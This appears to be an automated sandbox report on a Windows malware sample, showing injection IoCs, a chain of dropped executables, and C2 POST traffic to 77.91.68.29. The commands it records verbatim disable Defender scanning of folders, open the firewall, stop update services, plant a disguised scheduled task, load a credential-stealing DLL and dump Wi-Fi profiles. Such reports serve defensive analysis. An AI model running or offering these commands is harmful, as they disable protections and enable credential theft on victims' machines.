3936	MicrosoftEdgeCP.exe
3936	MicrosoftEdgeCP.exe
3936	MicrosoftEdgeCP.exe
3936	MicrosoftEdgeCP.exe

Suspicious use of AdjustPrivilegeToken 32 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3172	Process not Found
Token: SeCreatePagefilePrivilege	3172	Process not Found
Token: SeShutdownPrivilege	3172	Process not Found
Token: SeCreatePagefilePrivilege	3172	Process not Found
Token: SeShutdownPrivilege	3172	Process not Found
Token: SeCreatePagefilePrivilege	3172	Process not Found
Token: SeShutdownPrivilege	3172	Process not Found
Token: SeCreatePagefilePrivilege	3172	Process not Found
Token: SeDebugPrivilege	212	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	212	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	212	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	212	MicrosoftEdgeCP.exe
Token: SeShutdownPrivilege	3172	Process not Found
Token: SeCreatePagefilePrivilege	3172	Process not Found
Token: SeShutdownPrivilege	3172	Process not Found
Token: SeCreatePagefilePrivilege	3172	Process not Found
Token: SeShutdownPrivilege	3172	Process not Found
Token: SeCreatePagefilePrivilege	3172	Process not Found
Token: SeShutdownPrivilege	3172	Process not Found
Token: SeCreatePagefilePrivilege	3172	Process not Found
Token: SeShutdownPrivilege	3172	Process not Found
Token: SeCreatePagefilePrivilege	3172	Process not Found
Token: SeShutdownPrivilege	3172	Process not Found
Token: SeCreatePagefilePrivilege	3172	Process not Found
Token: SeShutdownPrivilege	3172	Process not Found
Token: SeCreatePagefilePrivilege	3172	Process not Found
Token: SeShutdownPrivilege	3172	Process not Found
Token: SeCreatePagefilePrivilege	3172	Process not Found
Token: SeShutdownPrivilege	3172	Process not Found
Token: SeCreatePagefilePrivilege	3172	Process not Found
Token: SeShutdownPrivilege	3172	Process not Found
Token: SeCreatePagefilePrivilege	3172	Process not Found

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
2220	MicrosoftEdge.exe
3936	MicrosoftEdgeCP.exe
212	MicrosoftEdgeCP.exe
3936	MicrosoftEdgeCP.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4204 wrote to memory of 4684	4204	0ed0316c928504190d336bf90266aa3cdf78ad218df28a41557b1eae8a1ed875.exe	71
PID 4204 wrote to memory of 4684	4204	0ed0316c928504190d336bf90266aa3cdf78ad218df28a41557b1eae8a1ed875.exe	71
PID 4204 wrote to memory of 4684	4204	0ed0316c928504190d336bf90266aa3cdf78ad218df28a41557b1eae8a1ed875.exe	71
PID 4204 wrote to memory of 4684	4204	0ed0316c928504190d336bf90266aa3cdf78ad218df28a41557b1eae8a1ed875.exe	71
PID 4204 wrote to memory of 4684	4204	0ed0316c928504190d336bf90266aa3cdf78ad218df28a41557b1eae8a1ed875.exe	71
PID 4204 wrote to memory of 4684	4204	0ed0316c928504190d336bf90266aa3cdf78ad218df28a41557b1eae8a1ed875.exe	71
PID 3172 wrote to memory of 5048	3172	Process not Found	72
PID 3172 wrote to memory of 5048	3172	Process not Found	72
PID 3172 wrote to memory of 5048	3172	Process not Found	72
PID 5048 wrote to memory of 4132	5048	F4B0.exe	73
PID 5048 wrote to memory of 4132	5048	F4B0.exe	73
PID 5048 wrote to memory of 4132	5048	F4B0.exe	73
PID 3172 wrote to memory of 3972	3172	Process not Found	74
PID 3172 wrote to memory of 3972	3172	Process not Found	74
PID 4132 wrote to memory of 4252	4132	Do7iI6vf.exe	76
PID 4132 wrote to memory of 4252	4132	Do7iI6vf.exe	76
PID 4132 wrote to memory of 4252	4132	Do7iI6vf.exe	76
PID 4252 wrote to memory of 2712	4252	au6aU0HN.exe	77
PID 4252 wrote to memory of 2712	4252	au6aU0HN.exe	77
PID 4252 wrote to memory of 2712	4252	au6aU0HN.exe	77
PID 3172 wrote to memory of 4476	3172	Process not Found	78
PID 3172 wrote to memory of 4476	3172	Process not Found	78
PID 3172 wrote to memory of 4476	3172	Process not Found	78
PID 2712 wrote to memory of 3132	2712	pA9Hb0XB.exe	79
PID 2712 wrote to memory of 3132	2712	pA9Hb0XB.exe	79
PID 2712 wrote to memory of 3132	2712	pA9Hb0XB.exe	79
PID 3172 wrote to memory of 4468	3172	Process not Found	80
PID 3172 wrote to memory of 4468	3172	Process not Found	80
PID 3172 wrote to memory of 4468	3172	Process not Found	80
PID 3132 wrote to memory of 4872	3132	sj7RY2tO.exe	81
PID 3132 wrote to memory of 4872	3132	sj7RY2tO.exe	81
PID 3132 wrote to memory of 4872	3132	sj7RY2tO.exe	81
PID 4872 wrote to memory of 2260	4872	1qT84OW3.exe	83
PID 4872 wrote to memory of 2260	4872	1qT84OW3.exe	83
PID 4872 wrote to memory of 2260	4872	1qT84OW3.exe	83
PID 4872 wrote to memory of 2260	4872	1qT84OW3.exe	83
PID 4872 wrote to memory of 2260	4872	1qT84OW3.exe	83
PID 4872 wrote to memory of 2260	4872	1qT84OW3.exe	83
PID 4872 wrote to memory of 2260	4872	1qT84OW3.exe	83
PID 4872 wrote to memory of 2260	4872	1qT84OW3.exe	83
PID 4872 wrote to memory of 2260	4872	1qT84OW3.exe	83
PID 4872 wrote to memory of 2260	4872	1qT84OW3.exe	83
PID 3132 wrote to memory of 2004	3132	sj7RY2tO.exe	85
PID 3132 wrote to memory of 2004	3132	sj7RY2tO.exe	85
PID 3132 wrote to memory of 2004	3132	sj7RY2tO.exe	85
PID 3936 wrote to memory of 2296	3936	MicrosoftEdgeCP.exe	93
PID 3936 wrote to memory of 2296	3936	MicrosoftEdgeCP.exe	93
PID 3936 wrote to memory of 656	3936	MicrosoftEdgeCP.exe	95
PID 3936 wrote to memory of 656	3936	MicrosoftEdgeCP.exe	95
PID 3936 wrote to memory of 656	3936	MicrosoftEdgeCP.exe	95
PID 3172 wrote to memory of 5932	3172	Process not Found	113
PID 3172 wrote to memory of 5932	3172	Process not Found	113
PID 3172 wrote to memory of 5932	3172	Process not Found	113
PID 3172 wrote to memory of 5484	3172	Process not Found	102
PID 3172 wrote to memory of 5484	3172	Process not Found	102
PID 3172 wrote to memory of 5484	3172	Process not Found	102
PID 5932 wrote to memory of 5668	5932	5CC8.exe	100
PID 5932 wrote to memory of 5668	5932	5CC8.exe	100
PID 5932 wrote to memory of 5668	5932	5CC8.exe	100
PID 5932 wrote to memory of 1744	5932	5CC8.exe	103
PID 5932 wrote to memory of 1744	5932	5CC8.exe	103
PID 5932 wrote to memory of 1744	5932	5CC8.exe	103
PID 5932 wrote to memory of 6016	5932	5CC8.exe	104
PID 5932 wrote to memory of 6016	5932	5CC8.exe	104

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\0ed0316c928504190d336bf90266aa3cdf78ad218df28a41557b1eae8a1ed875.exe
"C:\Users\Admin\AppData\Local\Temp\0ed0316c928504190d336bf90266aa3cdf78ad218df28a41557b1eae8a1ed875.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4204
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  PID:4684

C:\Users\Admin\AppData\Local\Temp\F4B0.exe
C:\Users\Admin\AppData\Local\Temp\F4B0.exe
1⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:5048
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Do7iI6vf.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Do7iI6vf.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:4132
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\au6aU0HN.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\au6aU0HN.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    PID:4252
  - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\pA9Hb0XB.exe
      C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\pA9Hb0XB.exe
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of WriteProcessMemory
      PID:2712
    - - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\sj7RY2tO.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\sj7RY2tO.exe
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of WriteProcessMemory
        
        PID:3132
      - C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1qT84OW3.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1qT84OW3.exe
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:4872
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        7⤵
        
        PID:2260
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 568
        8⤵
        Program crash
        
        PID:2120
      - C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2kY317Xn.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2kY317Xn.exe
        6⤵
        Executes dropped EXE
        
        PID:2004

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\F619.bat" "
1⤵
- Checks computer location settings
PID:3972

C:\Users\Admin\AppData\Local\Temp\F733.exe
C:\Users\Admin\AppData\Local\Temp\F733.exe
1⤵
- Executes dropped EXE
PID:4476

C:\Users\Admin\AppData\Local\Temp\F84D.exe
C:\Users\Admin\AppData\Local\Temp\F84D.exe
1⤵
- Executes dropped EXE
PID:4468

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2220

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:3472

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3936

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:212

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:1060

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:4400

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:4148

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:2296

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:1236

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:656

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:5036

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:5128

C:\Users\Admin\AppData\Local\Temp\2F3D.exe
C:\Users\Admin\AppData\Local\Temp\2F3D.exe
1⤵
PID:5932
- C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
  "C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"
  2⤵
  - Executes dropped EXE
  PID:5668
- - C:\Users\Admin\AppData\Local\Temp\Broom.exe
    C:\Users\Admin\AppData\Local\Temp\Broom.exe
    3⤵
    - Executes dropped EXE
    PID:6028
- C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
  "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
  2⤵
  - Executes dropped EXE
  PID:1744
- - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
    "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
    3⤵
    PID:6084
- C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
  "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
  2⤵
  - Executes dropped EXE
  PID:6016
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -nologo -noprofile
    3⤵
    PID:5496
- - C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
    "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
    3⤵
    PID:5264
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:6456
  - - C:\Windows\System32\cmd.exe
      C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
      4⤵
      PID:6428
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        
        PID:5384
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:2204
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:5368
- C:\Users\Admin\AppData\Local\Temp\kos4.exe
  "C:\Users\Admin\AppData\Local\Temp\kos4.exe"
  2⤵
  - Executes dropped EXE
  PID:5428
- - C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
    "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
    3⤵
    PID:6576
  - - C:\Users\Admin\AppData\Local\Temp\is-2712J.tmp\is-I7URF.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-2712J.tmp\is-I7URF.tmp" /SL4 $105A2 "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe" 5313270 114176
      4⤵
      PID:6864
    - - C:\Program Files (x86)\IBuster\IBuster.exe
        
        "C:\Program Files (x86)\IBuster\IBuster.exe" -i
        5⤵
        
        PID:6556
    - - C:\Windows\SysWOW64\net.exe
        
        "C:\Windows\system32\net.exe" helpmsg 3
        5⤵
        
        PID:6728
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 helpmsg 3
        6⤵
        
        PID:6320
    - - C:\Program Files (x86)\IBuster\IBuster.exe
        
        "C:\Program Files (x86)\IBuster\IBuster.exe" -s
        5⤵
        
        PID:7124
- C:\Users\Admin\AppData\Local\Temp\latestX.exe
  "C:\Users\Admin\AppData\Local\Temp\latestX.exe"
  2⤵
  PID:6044

C:\Users\Admin\AppData\Local\Temp\35B6.exe
C:\Users\Admin\AppData\Local\Temp\35B6.exe
1⤵
- Executes dropped EXE
PID:5484
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5484 -s 888
  2⤵
  - Program crash
  PID:5244

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5424

C:\Users\Admin\AppData\Roaming\tdvifjs
C:\Users\Admin\AppData\Roaming\tdvifjs
1⤵
PID:5776

C:\Users\Admin\AppData\Local\Temp\58B0.exe
C:\Users\Admin\AppData\Local\Temp\58B0.exe
1⤵
PID:6072
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 6072 -s 896
  2⤵
  - Program crash
  PID:6228

C:\Users\Admin\AppData\Local\Temp\5CC8.exe
C:\Users\Admin\AppData\Local\Temp\5CC8.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5932

C:\Users\Admin\AppData\Local\Temp\6593.exe
C:\Users\Admin\AppData\Local\Temp\6593.exe
1⤵
PID:6356
- C:\Users\Admin\AppData\Local\Temp\e8b5234212\Utsysc.exe
  "C:\Users\Admin\AppData\Local\Temp\e8b5234212\Utsysc.exe"
  2⤵
  PID:6800
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\Admin\AppData\Local\Temp\e8b5234212\Utsysc.exe" /F
    3⤵
    - Creates scheduled task(s)
    PID:5416
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "Utsysc.exe" /P "Admin:N"&&CACLS "Utsysc.exe" /P "Admin:R" /E&&echo Y|CACLS "..\e8b5234212" /P "Admin:N"&&CACLS "..\e8b5234212" /P "Admin:R" /E&&Exit
    3⤵
    PID:6400
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
      4⤵
      PID:2428
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "..\e8b5234212" /P "Admin:R" /E
      4⤵
      PID:6140
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "..\e8b5234212" /P "Admin:N"
      4⤵
      PID:5336
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
      4⤵
      PID:6660
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "Utsysc.exe" /P "Admin:R" /E
      4⤵
      PID:6644
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "Utsysc.exe" /P "Admin:N"
      4⤵
      PID:6600
- - C:\Windows\SysWOW64\rundll32.exe
    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\aca439ae61e801\cred64.dll, Main
    3⤵
    PID:6376
  - - C:\Windows\system32\rundll32.exe
      "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\aca439ae61e801\cred64.dll, Main
      4⤵
      PID:6448
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        5⤵
        
        PID:4544
- - C:\Windows\SysWOW64\rundll32.exe
    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\aca439ae61e801\clip64.dll, Main
    3⤵
    PID:3784

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6520

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:2420

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:6432

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:1104

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6168

C:\Users\Admin\AppData\Local\Temp\e8b5234212\Utsysc.exe
C:\Users\Admin\AppData\Local\Temp\e8b5234212\Utsysc.exe
1⤵
PID:2660

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
1⤵
PID:4632
- C:\Windows\System32\sc.exe
  sc stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:6880
- C:\Windows\System32\sc.exe
  sc stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:6984
- C:\Windows\System32\sc.exe
  sc stop wuauserv
  2⤵
  - Launches sc.exe
  PID:5296
- C:\Windows\System32\sc.exe
  sc stop bits
  2⤵
  - Launches sc.exe
  PID:6460
- C:\Windows\System32\sc.exe
  sc stop dosvc
  2⤵
  - Launches sc.exe
  PID:6912

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
1⤵
PID:6420

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:5848
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-ac 0
  2⤵
  PID:5808
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-dc 0
  2⤵
  PID:6272
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-ac 0
  2⤵
  PID:4600
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-dc 0
  2⤵
  PID:6940

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6112

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:1064

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
1⤵
PID:4260

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
PID:3368

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:2104

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6428

Network

POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://wnpewhnbgk.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 315
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Fri, 03 Nov 2023 04:49:36 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 7
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://qbetsste.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 210
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Fri, 03 Nov 2023 04:49:36 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://wtola.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 160
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Fri, 03 Nov 2023 04:49:37 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://tbanvuelwb.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 177
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

